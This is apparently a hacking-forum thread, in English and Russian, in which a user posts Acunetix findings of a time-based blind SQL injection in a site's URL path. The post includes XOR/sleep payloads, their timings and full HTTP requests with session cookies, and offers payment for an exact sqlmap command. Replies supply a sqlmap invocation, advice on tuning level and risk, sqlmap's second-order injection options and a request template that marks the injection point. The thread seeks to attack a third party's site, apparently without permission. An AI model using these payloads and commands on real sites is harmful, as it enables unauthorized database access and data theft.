Acunetix SQL, looking for help

[datelover]

When I was testing a website today, I found such SQL injection, which is the first time I encountered。
I have used many sqlmap commands, but all failed. Can anyone help me, write down the exact sqlmap command, it is much appreciated, maybe I can pay some thanks。


URL:https://www.example.com/
Parameter:/<s>/[*]/

Path Fragment input /<s>/[*]/ was set to 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

Tests performed:
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.664
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.199
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.187
0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.194
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.216
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.189
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.198

Original value: s_ship


GET /shangjia/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.example.com/
Cookie: PHPSESSID=e249776d8f8aba2ef24df4f32a7af88d; qpZg_566b_fromPC=4089tZcrxBdEyoA0Iqhf%2BEV0UoExwn7sTdYb8FrCORlqF9LojmUGN2Sd3%2BU; qpZg_566b_tailshenqingip=93f3Orvwzva9kfBjADF8HWOeEJQS0KvZi63LBYT9ACPFgPZ%2BuZshn%2FVAXPY5og; Secure; qpZg_566b_authNum=7002gUiwmqexj84NPKU0758LSS4qvkS2Xj4DFsKWMyEGitvTGT5GNarlEWeoO1LWG3F6qj8V; qpZg_566b_authCode=335aHQcn9ifoQITXOWV1rAgIjiKTE2NkoWFPM8TiKVo%2FIQ; qpZg_566b_choosePC=e4beFciqxYVSssW7%2BPE%2B2rJcHu%2FDvQaHExw5zged0X8O5atarDQvWg; qpZg_566b_newsFromPC=8f87355RsIaDJOqgsY3z3B0QBII1C9i0oQy8xq11YAbiefEHfxoj%2FFYoT5V8VgfWgAk05N7CpaRcq2seIaSGN9xOzBnDJ2blgQfYZbkigbziGpK9oWhgy7VdKYRspaq7X4PfprjqcllhDYPYfgjlOt5QbPvrF%2FN6MPnZ9CYbrZJJVN76I8nX%2FeWKWbndSNXKQGOFrdn%2Bn2Gr%2BKsNN%2Bh%2BubSLtV%2F7Rv2cgGapxI5r3iFvQohWDvZulm81; predomain=cHJlfDI1Mnzlub%2Flt558aHR0cDovL2d6LmVkYWkuY29tL3xneg%3D%3D; changeCity=0; yipdomain=yip%7C22%7C%E9%87%8D%E5%BA%86%7Chttp%3A%2F%2Fcq.edai.com%7Ccq; qpZg_566b_evaluate_salary=7905QEAzSvThTuCYb%2Bv8nvdP2vPJfW9OtlJKt1gD4g; qpZg_566b_daikuan=9f79asEMr8yfGa4AhZnJkas%2BjiIdrrpXJ45rUY3bcxey3MINZQP8yywKu3kVVkBmOCSMfaEsEcv23PmFTgkYjfbN2CKk7JqecJkdOQtgouB40lOOaatVCHdI4csRd2HNiaxeRRRqqfXLfbXC65QSxRuYV0Wb9FsBQFdsDg7gUYJd0a6dFGNkOOwXCNJSlWVFUYNbBoAvACJgXFQ
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: www.example.com
Connection: Keep-alive

 

[datelover]

The second injection point is this。


URL:https://www.example.com/
Parameter:/<s>/[*].html

Path Fragment input /<s>/[*].html was set to 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

Tests performed:
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.213
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.319
0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.207
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.315
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.188
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.219
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.194

Original value: guwen


GET /shangjia/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z.html HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.example.com/
Cookie: PHPSESSID=e249776d8f8aba2ef24df4f32a7af88d; qpZg_566b_fromPC=4089tZcrxBdEyoA0Iqhf%2BEV0UoExwn7sTdYb8FrCORlqF9LojmUGN2Sd3%2BU; qpZg_566b_tailshenqingip=dee5mneZRSZWsWk81WZrkOQMQOBgXXXYcB%2FKi%2Bs%2F%2F9BTK8A3SkQtXwUOot%2Fexg; Secure; qpZg_566b_authNum=41f5Ai35OjHQ44HimyVcYtNPbZOBtb%2Bfo7q5%2FGtbN3KTa6w9iQ7%2BEqD8lr4oTJFW%2FXwWaK6X; qpZg_566b_authCode=b57cyOXDMYR0CHHmKEUnkspeQQcQzFzjC2IIWo9PXGnr0A; qpZg_566b_choosePC=a8241mNILiCaVs0nUjpRm4TJjlSdOGipdtZz05fksA8dkAJwlAXw; qpZg_566b_newsFromPC=8f87355RsIaDJOqgsY3z3B0QBII1C9i0oQy8xq11YAbiefEHfxoj%2FFYoT5V8VgfWgAk05N7CpaRcq2seIaSGN9xOzBnDJ2blgQfYZbkigbziGpK9oWhgy7VdKYRspaq7X4PfprjqcllhDYPYfgjlOt5QbPvrF%2FN6MPnZ9CYbrZJJVN76I8nX%2FeWKWbndSNXKQGOFrdn%2Bn2Gr%2BKsNN%2Bh%2BubSLtV%2F7Rv2cgGapxI5r3iFvQohWDvZulm81; predomain=cHJlfDI1Mnzlub%2Flt558aHR0cDovL2d6LmVkYWkuY29tL3xneg%3D%3D; changeCity=0; yipdomain=yip%7C1%7C%E5%8C%97%E4%BA%AC%7Chttp%3A%2F%2Fbj.edai.com%7Cbj; qpZg_566b_evaluate_salary=7905QEAzSvThTuCYb%2Bv8nvdP2vPJfW9OtlJKt1gD4g; qpZg_566b_daikuan=c520EQYQA5wjiwfJ82zoT7xbz77D8haTTFDHK%2BxOR4IcdvCbdU629NKWNCVwLGX5gBdtpu7zn03Tl9SYD82QH9mA6h2inTjh48KEdfBxiNUBcfv3aIyaztUj7JLpOLgteV8glOfmvEW%2FZBAcZw%2FFCRu1b2oaEiR%2BmRxuAnmYibNGvWxZaE4lXBjEWmdOBk2p%2FGfR%2F9jbZbrgl73GMM8E3FNRDKz6t%2FkhvHcZ47PtfTz2%2F%2BK5IVtv6F9ADfPhxyKDz5uyx55VAN3Xp1jQ%2FKrWwneUlyDqrpfeHoUeW1HCEyeIJXRndA%2BBn%2BuqHC8o%2FfbxZ6UpSldvYPH%2FhQDru%2BoSxT2FLH%2FW1D6pZ9jnoA; qpZg_566b_city=a946pCKT%2BSd3ERz05e0DAJhQ1dSqmNbO9PsEW5kEng; Secure
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: www.example.com
Connection: Keep-alive

 

[etc/passwd]

--url="site//shangjia/guwen*" --dbms=mysql --random-agent
Дальше играйся с level и risk

 

[Desoxyn]

Second-order attack​

Options: --second-url and --second-req
Second-order SQL injection attack is an attack where result(s) of an injected payload in one vulnerable page is shown (reflected) at the other (e.g. frame). Usually that's happening because of database storage of user provided input at the original vulnerable page.
You can manually tell sqlmap to test for this type of SQL injection by using option --second-order with the URL address or --second-req with request file for sending to the server where results are being shown.

The second injection point is this

Usage

Automatic SQL injection and database takeover tool - sqlmapproject/sqlmap

github.com

Бля, или это просто вторая иньекция найдена? ))))
тогда

GET /shangjia/0*.html HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.example.com/
Cookie: PHPSESSID=e249776d8f8aba2ef24df4f32a7af88d; qpZg_566b_fromPC=4089tZcrxBdEyoA0Iqhf%2BEV0UoExwn7sTdYb8FrCORlqF9LojmUGN2Sd3%2BU; qpZg_566b_tailshenqingip=dee5mneZRSZWsWk81WZrkOQMQOBgXXXYcB%2FKi%2Bs%2F%2F9BTK8A3SkQtXwUOot%2Fexg; Secure; qpZg_566b_authNum=41f5Ai35OjHQ44HimyVcYtNPbZOBtb%2Bfo7q5%2FGtbN3KTa6w9iQ7%2BEqD8lr4oTJFW%2FXwWaK6X; qpZg_566b_authCode=b57cyOXDMYR0CHHmKEUnkspeQQcQzFzjC2IIWo9PXGnr0A; qpZg_566b_choosePC=a8241mNILiCaVs0nUjpRm4TJjlSdOGipdtZz05fksA8dkAJwlAXw; qpZg_566b_newsFromPC=8f87355RsIaDJOqgsY3z3B0QBII1C9i0oQy8xq11YAbiefEHfxoj%2FFYoT5V8VgfWgAk05N7CpaRcq2seIaSGN9xOzBnDJ2blgQfYZbkigbziGpK9oWhgy7VdKYRspaq7X4PfprjqcllhDYPYfgjlOt5QbPvrF%2FN6MPnZ9CYbrZJJVN76I8nX%2FeWKWbndSNXKQGOFrdn%2Bn2Gr%2BKsNN%2Bh%2BubSLtV%2F7Rv2cgGapxI5r3iFvQohWDvZulm81; predomain=cHJlfDI1Mnzlub%2Flt558aHR0cDovL2d6LmVkYWkuY29tL3xneg%3D%3D; changeCity=0; yipdomain=yip%7C1%7C%E5%8C%97%E4%BA%AC%7Chttp%3A%2F%2Fbj.edai.com%7Cbj; qpZg_566b_evaluate_salary=7905QEAzSvThTuCYb%2Bv8nvdP2vPJfW9OtlJKt1gD4g; qpZg_566b_daikuan=c520EQYQA5wjiwfJ82zoT7xbz77D8haTTFDHK%2BxOR4IcdvCbdU629NKWNCVwLGX5gBdtpu7zn03Tl9SYD82QH9mA6h2inTjh48KEdfBxiNUBcfv3aIyaztUj7JLpOLgteV8glOfmvEW%2FZBAcZw%2FFCRu1b2oaEiR%2BmRxuAnmYibNGvWxZaE4lXBjEWmdOBk2p%2FGfR%2F9jbZbrgl73GMM8E3FNRDKz6t%2FkhvHcZ47PtfTz2%2F%2BK5IVtv6F9ADfPhxyKDz5uyx55VAN3Xp1jQ%2FKrWwneUlyDqrpfeHoUeW1HCEyeIJXRndA%2BBn%2BuqHC8o%2FfbxZ6UpSldvYPH%2FhQDru%2BoSxT2FLH%2FW1D6pZ9jnoA; qpZg_566b_city=a946pCKT%2BSd3ERz05e0DAJhQ1dSqmNbO9PsEW5kEng; Secure
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: www.example.com
Connection: Keep-alive

Все одно и то же...